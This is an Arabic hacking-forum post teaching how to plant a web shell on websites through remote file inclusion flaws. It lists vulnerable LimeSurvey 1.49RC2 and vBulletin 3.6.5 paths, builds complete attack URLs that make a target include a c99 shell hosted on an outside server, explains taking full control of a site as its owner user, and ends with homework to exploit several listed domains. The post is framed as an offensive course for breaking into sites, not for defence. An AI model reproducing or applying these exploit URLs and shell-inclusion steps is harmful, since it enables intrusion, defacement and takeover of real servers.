No-MiRcE مؤسس المدرسه
عدد المساهمات : 105 تاريخ التسجيل : 01/01/2010 العمر : 31
| موضوع: ×××××××××كيفية رفع الشـــل××××مهم للكل××× الأربعاء يناير 27, 2010 2:28 pm | |
|
ام الطرق الثانية راح تكون في درس منفصل بإذن الله
الطريقة اللي راح اشرحها الحين وهي عن طريق [ الثغرات ]
يعني نرفع شيل من خلال ثغره
طبعاً الثغرات أنواع كثيره ولازم الواحد يتعمق فيها لكن دورتنا ما راح اشرح الثغرات كلها
راح اشرح اسهل نوع من انواع الثغرات ويأدي الغرض اللي نبيه ..
وهو ثغرات الـ File Include ( الفايل انكلود ) أو بالعربي ادراج ملف
يمكننا البحث عن الثغرات في مواقع الحماية وانا انصح بهذي المواقع
www.milw0rm.com www.securityreason.com
لأن البحث عن الثغرات فيها بسيط وهي من اقوى المواقع في نفس الوقت
طبعاً انا راح اشرح كيف يتم استغلال ثغرات الفايل انكلود
نختار ثغرة من الميل ورم مثلاً
هذي الثغره
http://www.milw0rm.com/exploits/4156
تعالوا نطلع عليها
نشوف هالأشياء
فيها اسم المكتشف ووو .. لكن شوفوا هالخانات ك
------------------------------------------------------------ ## ****************** site : www.limesurvey.org -----------------------------------------------------------
------------------------------------------------------------ ## ****************** ************ : LimeSurvey (PHPSurveyor) ## Version : 1.49RC2 -----------------------------------------------------------
****************** site = موقع مبرمج السكريبت ****************** ************ = اسم السكربت المصاب Version = الاصدار المصاب
طيب واحد يقول لنا يا بو عابد وش هو السكريبت ؟
السكريبت هو برنامج مبرمج بلغة الـ php مثل سكربت المنتدى وسكربت البطاقات .. الخ
الحين الثغره اللي عرضتها فوق يقول لنا في سكريبت اسمه LimeSurvey فيه ثغرة فايل انكلود
يعني نقدر ندرج من خلالها شيل .. او بالأصح اي موقع مركب هالسكريبت نقدر نرفع فيه شيل
تعالوا نكمل نشوف الثغره
نشوف هالخانه كود PHP:
------------------------------------------------------------
كود PHP: )## Type : RFI(Remote File Include
-----------------------------------------------------------
Type = النوع
مثل ماهوب ظاهر لنا ريموت فايل انكلود ( يعني ادراج ملف عن بعد )
واختصارها RFI وهي أول حرف من كلمة كلمة
المهم عرفنا انها فايل انكلود اتركوا كل الكلام لأنه ما يفيدنا
اهم شي في الثغره نعرفه
هو
1- اسم السكريبت المصاب . ( عرفنا في ثغرتنا انه اسم السكريبت المصاب هو LimeSurvey ) 2- الاصدار المصاب . ( عرفنا في ثغرتنا فوق ان الاصدار المصاب هو 1.49RC2 ) 3- نوع الثغره . ( عرفنا فوق ان الثغرات اللي حنا نشرح عليها فايل انكلود أي ثغرات ثانية استغلالها مختلف ) 4- الاستغلال .
الحين عرفنا كل الأنواع أين الاستغلال
تعالوا نرجع لصفحة الثغره هنا
http://www.milw0rm.com/exploits/4156
ابحثوا عن عبارة Exploit وتعني ( الاستغلال )
انا لقيتها كود PHP:
------------------------------------------------------------ ## Exploit : -----------------------------------------------------------
نلاحظ ان فيه اكثر من استغلال
------------------------------------------------------------
كود PHP: وهذي هي الاستغلالات ## /admin/classes/pear/OLE/PPS/File.php?homedir=[***************]## /admin/classes/pear/OLE/PPS/Root.php?homedir=[***************]## /admin/classes/pear/Spreadsheet/Excel/Writer.php?homedir=[***************]## /admin/classes/pear/OLE/PPS.php?homedir=[***************]## /admin/classes/pear/Spreadsheet/Excel/Writer/Worksheet.php?homedir=[***************]## /admin/classes/pear/Spreadsheet/Excel/Writer/Parser.php?homedir=[***************]## /admin/classes/pear/Spreadsheet/Excel/Writer/Workbook.php?homedir=[***************]## /admin/classes/pear/Spreadsheet/Excel/Writer/Format.php?homedir=[***************]## /admin/classes/pear/Spreadsheet/Excel/Writer/BIFFwriter.php?homedir=[***************]
----------------------------------------------------------- ناخذ استغلال من الاستغلالات /admin/classes/pear/OLE/PPS/File.php?homedir=[***************] تعالوا نحلل الاستغلال هذا admin = مجلد classes = مجلد آخر pear = مجلد ثاني آخر OLE = مجلد ثالث آخر PPS = مجلد رابع آخر .. يا ليل البعارين File.php = الملف المصاب
تعالوا نترجم الاستغلال
يقول لك الاستغلال ادخل مجلد admin داخله بتلقى مجلد classes ادخله وبتلقى داخله مجلد ثاني pear ادخله وداخله بتلقى مجلد ثالث OLE
ادخله وداخله بتلقى مجلد PPS داخل هالمجلد بتلقى ملف File.php وهو الملف المصاب
طيب ترجمنا الاستغلال ترى ما نحتاج الترجمه بس عشان تفهمون لا أكثر ولا أقل
لو جينا وقلنا هذا موقع
www.hack15.com
سكريبت LimeSurvey اصداره 1.49RC2 راكب عليه هنا
www.hack15.com/ls
وحنا عندنا ثغرة نرفع الشيل تعالوا نستغلها
بما ان السكريبت داخل مجلد ls في الموقع
راح يكون تطبيقنا كذا كود PHP:
------------------------------------------------------------
كود PHP: http://www.hack15.com/ls/admin/class...e.php?homedir=
[***************] ----------------------------------------------------------- هذا هو الاستغلال الحين كل اللي علينا نستبدل عبارة [***************] برابط شيل مرفوع على اي موقع بامتداد txt لو انا مثلاً رافع شيل على موقع بامتداد txt كمثال شوف http://younes.by.ru/c99.txt هذا شيل c99 مرفوع على موقع لاحظوا ان امتداده هو txt وليس php وهذا أمر مهم جداً لأننا نريد سحب الأكواد من المفكرة وترجمتها بالموقع المصاب وليس قراءة الملف في الموقع اللي رافعين عليه الشيل الاستغلال بيكون كذا
كود PHP: ------------------------------------------------------------
كود PHP: http://www.hack15.com/ls/admin/class...by.ru/c99.txt?
-----------------------------------------------------------
لاتنسوا عند الادراج تضعون علامة الاستفاهم في نهاية الاستغلال تعالوا نترجم الأمر اللي سويناه لو الحين فتحنا الصفحة هذي
كود PHP: ------------------------------------------------------------
كود PHP: http://www.hack15.com/ls/admin/class...by.ru/c99.txt?
-----------------------------------------------------------
بيعرض لنا الشيل اللي حنا رافعينه على موقع ثاني ولكن بينعرض على موقع بيت الهكرز تعالوا نحلل الاستغلال ثاني حنا الحين من خلال ثغرة في سكريبت مرفوع على موقع بيت الهكرز
أمرنا السكريبت بأن يقوم بإدراج أكواد هذي الصفحة http://younes.by.ru/c99.txt داخل بيت الهكرز وقراءتها على سيرفر بيت الهكرز
يعني انه بيسحب أكواد الشيل ويشغله على بيت الهكرز
وبكذا بيعرض لنا الشيل على بيت الهكرز وحنا في الحقيقه ما رفعناه على الموقع كل اللي سويناه عرض على الموقع
ونقدر نتحكم بالموقع كامل من خلال هالطريقه .. وكذلك لو كان في مجلد مصرح 777 تقدر ترفع فيه الشيل على المواقع او صفحتك او اي شي
الحين نجي لدرسنا السابق وهو الصلاحيات الحين لو عرضنا الشيل على بيت الهكرز
وطلعت لنا الصلاحية = hack15 هذا يعني ان صلاحيتنا يوزر عالموقع يعني نقدر نتحكم في مجلد بيت الهكرز
يعني ما يحتاج تصريح 777 تقدر ترفع اندكسك بالصفحة الرئيسية وتلعب بالموقع كامل لعب لأن صلاحيتك حالياً هي يوزر يعني مالك الموقع
وبكذا نكون انتهينا من شرح استغلال ثغرات الفايل انكلود والحمد لله
قبل ما اطلع من الدرس حاب اعطيكم هدية بسيطه =============================================== جاني واحد من الشباب وعطاني هالثغره ثغرتين فايل انكلود تساعدك لرفع شل على نسخة ال 3.6.5 vb الثغره مجربه علي اكثر من منتدي اجنبي كود PHP: -----------------------------------------------------
كود PHP: vb/includes/functions_cron.php?nextitem=***************
------------------------------------------------------------ كود PHP:
-------------------------------------------------------
كود PHP: vb/includes/functions.php?classfile=*************** vb/includes/functions_forumdisplay.php?specialtemplates= ***************
----------------------------------------------------------
مثال على الاستغلال :- http://www.hack15.com/vb/includes/fu...cialtemplates= *************** لا تنسى استبدال *************** برابط شيل txt ولاتنسى علامة الاستفاهم واحلى اختراق ================================================== تعالوا ما انتهينا يا حلوين .. هع مافي راحة
اسئلة اليوووم ^_^
حنا شرحنا فوق الثغره وانا شرحت استغلال واحد من الاستغلالات
الحين راع اعطي أمثلة مواقع ( وهمية )
هذي مواقع نفترض انها مركبة السكريبت والسكريبت فيها موجود بمجلد ss الموضوع الأصلى من هنا: شياطين الحماية Security Eviles ll http://www.sec-eviles.com/vb/showthread.php?p=24123
هذي هي
كود PHP: www.soper.com/ss الموضوع الأصلى من هنا: شياطين الحماية Security Eviles ll http://www.sec-eviles.com/vb/showthread.php?p=24123 www.ksa.com/ss www.sos.com/ss www.7looo.com/ss
ابيكم ترجعون تشوفون الاستغلالات فوق وتستغلونها على هذي المواقع
وكل استغلال مختلف عن الثاني يعني لا يجي واحد يطبق لي نفس الاستغلال غلى المواقع كلها
ويكون الاستغلال كامل مع الشيل وكل شي ..
مثال على استغلال كامل كود PHP: ------------------------------------------------------------------
كود PHP: http://www.hack15.com/ls/admin/class...by.ru/c99.txt?
--------------------------------------------------------------------لو بعد كل ده والشل ما اترفعش ورح قسم الدورات وحمل اكتشاف الثغرات فى السكربتات وبكده هترفه شيل بكل سهوله | |
|